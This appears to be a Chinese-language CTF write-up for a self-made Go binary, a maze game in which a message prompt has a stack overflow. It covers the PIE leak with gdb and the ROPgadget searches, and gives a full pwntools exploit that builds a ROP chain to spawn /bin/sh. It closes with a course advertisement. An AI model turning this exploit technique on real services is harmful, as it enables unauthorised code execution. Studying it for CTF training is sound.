0x01 题目设计

大概逻辑是随便瞎走，然后一共有4个宝藏，在角落上的三个是忽悠人的，随机的那个宝藏4才能留言触发栈溢出

1. 栈溢出

栈溢出比较简单，问题是在go中的实现就比较麻烦了，具体参考我对seccon2017那道题目的源码复现：http://leanote.com/blog/post/5c64bb2bab64415167000f48

2. go线程堵塞

这里实现了一个多线程，当靠近了宝藏4就会新生成一个宝藏4。而在go里的多线程中有一个叫做channel的通道可以在不同线程中传输值，而如果传值了没取那么线程会堵塞在传值那条语句中，于是就不会继续随机了。

3. 编译

保护全开+去符号表

go build -buildmode=pie -ldflags "-extldflags=-Wl,-z,now,-z,relro -s -w" kx.go

不过实际上有用处的也就是pie，可以通过栈溢出泄露

gdb-peda$ vmmap
StartEndPermName
0x000000c0000000000x000000c000001000 rw-p	mapped
=>
gdb-peda$ x /10xg0x000000c000000000
0xc000000000:0x00007ffff7fb30000x00007ffff7fb3078
=>
gdb-peda$ x /10xg0x00007ffff7fb3000+8
0x7ffff7fb3008:0x00005555559e13400x00005555559e1340

0x02 exp编写

1. 控制rip

输入长字符串后，直接看报错：

goroutine 1[running]:
runtime.systemstack_switch()
/usr/lib/go-1.6/src/runtime/asm_amd64.s:245 fp=0xc820037ae0 sp=0xc820037ad8
runtime.mallocgc(0x4138674137674136,0x0,0xc800000003,0x12c)
/usr/lib/go-1.6/src/runtime/malloc.go:665+0x9eb fp=0xc820037bb8 sp=0xc820037ae0
runtime.rawstring(0x4138674137674136,0x0,0x0,0x0,0x0,0x0)
/usr/lib/go-1.6/src/runtime/string.go:284+0x70 fp=0xc820037c00 sp=0xc820037bb8
runtime.rawstringtmp(0x0,0x4138674137674136,0x0,0x0,0x0,0x0,0x0)
/usr/lib/go-1.6/src/runtime/string.go:111+0xb7 fp=0xc820037c38 sp=0xc820037c00
runtime.slicebytetostring(0x0,0x6741356741346741,0x4138674137674136,0x3168413068413967,0x0,0x0)
/usr/lib/go-1.6/src/runtime/string.go:93+0x6f fp=0xc820037cd0 sp=0xc820037c38
main.walk(0x396a4138,0x0,0xc820037ee0)
/root/golang/kx.go:94+0x6a6 fp=0xc820037e48 sp=0xc820037cd0

可以看到，应该是覆盖buf却把栈上的数据给覆盖了，那么直接给个可读地址替换一下就行了，最后用下面这个payload就能控制返回地址了：

payload ='a'*192+ p64(0x000000c000000000)+ p64(8)+'b'*80+ p64(0x12345678)

2. 写入binsh

那么接下来要做的就是构造rop链了，最终目标是执行：

execve("/bin/sh")
=>
syscall rax=0x3b
rdi=addr_of_binsh
rsi=rdx=0

首先是把binsh写到bss上：

ROPgadget--binary kx | grep  "mov qword ptr \[rdi\]"
0x000000000012ddd5: mov rax, qword ptr [rsi]; mov qword ptr [rdi], rax ; ret

那么现在就需要rax和rdi可控了，这样就能任意地址写了：

ROPgadget--binary kx | grep  "pop rax"
0x000000000003d4e8: pop rax ; ret
ROPgadget--binary kx | grep  "pop rdi"
0x0000000000109fcd: pop rdi ; ret

3. syscall参数设置

还需要控制rdx和rsi

ROPgadget--binary kx | grep  "pop rsi"
0x0000000000113d1e: pop rsi ; ret
ROPgadget--binary kx | grep  "pop rdx"
0x0000000000152a0e: pop rdx ;orbyte ptr [rax -0x77], cl ; ret // 这里需要先将rax设置为一个可写地址

4. getshell

最后就只需要syscall了

ROPgadget--binary kx | grep  "syscall"
0x000000000012de39: syscall ; ret

0x03 exp

#!/usr/bin/env python
# coding=utf-8
from pwn import*
from random import random
import sys, time
context.log_level ='debug'
context.terminal =['tmux','splitw','-h']
context.binary ="./kx"
p = remote("127.0.0.1",8888)
def walk():
    step =["w","s","a","d"]
whileTrue:
        recv = p.recvuntil(">>")
if"Treasure 4"in recv:
print("success!")
return
        p.sendline(step[int(random()*4)])
p.recvuntil("Please input you name :")
p.sendline("mutepig")
# leak golang_base
walk()
payload ='a'*192+ p64(0x000000c000000000)+ p64(8)
p.sendline(payload)
p.recvuntil("Ok.Your message: ")
leak = u64(p.recv(8))
# leak code base
walk()
payload ='a'*192+ p64(leak+8)+ p64(8)
p.sendline(payload)
p.recvuntil("Ok.Your message: ")
base_addr = u64(p.recv(8))-0x48d340
# ROP
walk()
pop_rax = p64(base_addr +0x18330)
pop_rdi = p64(base_addr +0x10a34d)
pop_rsi = p64(base_addr +0x11409e)
pop_rdx = p64(base_addr +0x15312e)
writeable_addr = p64(base_addr +0x487e80)#p64(0x000000c000000000)
move_rdi_rax = p64(base_addr +0x12ddc9)
syscall_addr = p64(base_addr +0x12e1b9)
payload ='a'*192+ p64(0x000000c000000000)+ p64(8)+'b'*80#+ p64(0x12345678)
## write binsh
payload += pop_rax
payload +="/bin/sh\x00"
payload += pop_rdi
payload += writeable_addr
payload += move_rdi_rax
## set rsi=rdi=0, rax=0x3b
payload += pop_rsi
payload += p64(0)
payload += pop_rax
payload += p64(0x000000c000000077)
payload += pop_rdx
payload += p64(0)
payload += pop_rax
payload += p64(0x3b)
## exploit
payload += syscall_addr
p.sendline(payload)
p.interactive()

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》，视频+靶场+题目！助力进入CTF世界